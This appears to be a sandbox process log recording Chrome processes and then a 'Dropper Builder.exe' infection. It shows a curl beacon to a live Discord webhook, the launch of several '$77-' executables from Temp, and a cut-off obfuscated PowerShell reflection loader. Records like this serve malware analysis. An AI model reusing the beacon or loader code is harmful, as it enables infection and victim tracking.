C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3468 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4248 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=5320 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5460 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=5676 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5976 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6084 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6376 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6552 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=6712 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=5840 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=6992 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=6404 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=7120 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=7104 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=7380 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=7220 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=7720 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=6876 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=7988 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --mojo-platform-channel-handle=8136 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=8320 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --mojo-platform-channel-handle=8496 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=8632 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --mojo-platform-channel-handle=8680 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --mojo-platform-channel-handle=8976 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --mojo-platform-channel-handle=8480 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=9400 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=9456 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --mojo-platform-channel-handle=8656 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=9688 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --mojo-platform-channel-handle=9612 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --mojo-platform-channel-handle=10004 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=10128 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=6116 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=10064 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=6100 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --mojo-platform-channel-handle=10060 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --mojo-platform-channel-handle=9008 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --mojo-platform-channel-handle=9432 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --mojo-platform-channel-handle=5792 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --mojo-platform-channel-handle=9736 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --mojo-platform-channel-handle=9024 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=5616 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=10108 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --mojo-platform-channel-handle=9028 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --mojo-platform-channel-handle=10628 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=8072 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=4992 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=10356 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --mojo-platform-channel-handle=11140 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --mojo-platform-channel-handle=11144 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --mojo-platform-channel-handle=8380 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --mojo-platform-channel-handle=11524 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --mojo-platform-channel-handle=11704 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --mojo-platform-channel-handle=11504 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --mojo-platform-channel-handle=12004 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --mojo-platform-channel-handle=12172 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --mojo-platform-channel-handle=12300 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=12336 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --mojo-platform-channel-handle=12468 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --mojo-platform-channel-handle=12816 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --mojo-platform-channel-handle=12184 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2720 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9296 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2744 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2448 --field-trial-handle=1832,i,2320256276452301191,14154629315255904906,131072 /prefetch:8
C:\Users\Admin\Downloads\Dropper Builder.exe
"C:\Users\Admin\Downloads\Dropper Builder.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Windows\SysWOW64\curl.exe
curl "https://discord.com/api/webhooks/1253936460533596222/A6HxzIjIDIKyWDj0ckcP1MgqmlK_CMtEmYhM4dwuWmPFk2q_02wySjZSHZuHPAmtdoBM" -X POST -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0" -H "Accept: application/json" -H "Accept-Language: en" -H "Accept-Encoding: gzip, deflate, br" -H "Referer: https://discohook.org/" -H "Content-Type: application/json" -H "Origin: https://discohook.org" -H "Connection: keep-alive" -H "Sec-Fetch-Dest: empty" -H "Sec-Fetch-Mode: cors" -H "Sec-Fetch-Site: cross-site" -H "TE: trailers" --data-raw "{""content"":""`Admin` Ran The File!"",""embeds"":null,""avatar_url"":""https://us.rule34.xxx//samples/1568/sample_2462f27a30bcbb733609276995ca37d4a7c91a2d.jpg?10163103"",""attachments"":[]}"
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
"C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
"C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
"C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
C:\Users\Admin\AppData\Local\Temp\$77-install.exe
"C:\Users\Admin\AppData\Local\Temp\$77-install.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:RuIdwLFZdpne{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$UVutwbAoqZVCtH,[Parameter(Position=1)][Type]$igcSbrqbOz)$apNYbVnfyTC=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+'d'+''+'D'+''+[Char](101)+''+'l'+''+'e'+'g'+'a'+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+[Char](77)+'em'+'o'+''+[Char](114)+'y'+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+'ga'+'t'+'eTy'+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+'a'+'s'+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c'+','+''+'S'+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+''+','+''+'A'+'nsi'+[Char](67)+'la'+'s'+''+[Char](115)+','+[Char](65)+''+'u'+''+'t'+'oC'+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$apNYbVnfyTC.DefineConstructor('R'+[Char](84)+''+[Char](83)+'p'+[Char](101)+''+'c'+''+[Char](105)+'al'+[Char](78)+''+[Char](97)+''+[Char](109)+'e'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$UVutwbAoqZVCtH).SetImplementationFlags('R'+'u'+'n'+'t'+''+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+'a'+'ged');$apNYbVnfyTC.DefineMethod('I'+[Char](110)+'v'+[Char](111)+''+[Char](107)+''+'e'+'','P'+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+','+''+'H'+''+'i'+''+[Char](100)+''+'e'+''+'B'+'yS'+[Char](105)+''+[Char](103)+',N'+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+'o'+''+'t'+',V'+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+'l'+'',$igcSbrqbOz,$UVutwbAoqZVCtH).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+'t'+''+'i'+''+'m'+''+'e'+''+','+''+[Char](77)+''+[Char](97)+'n'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $apNYbVnfyTC.CreateType();}$wrKoaJuctLjFo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+'m'+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+'t'+''+[Char](46)+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+'s'+''+'a'+''+'f'+'e'+[Char](78)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](118)+'e'+[Char](77)+''+'e'+''+'t'+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$YddLyJKHpNyhAu=$wrKoaJuctLjFo.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'Pr'+'o'+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+'s'+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+'S'+''+[Char](116)+''+[Char](97)+'t'+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aAimDKIDCiENaekgzNL=RuIdwLFZdpne @([String])([IntPtr]);$HjoRkpFocncOZqvdSwRmVO=RuIdwLFZdpne 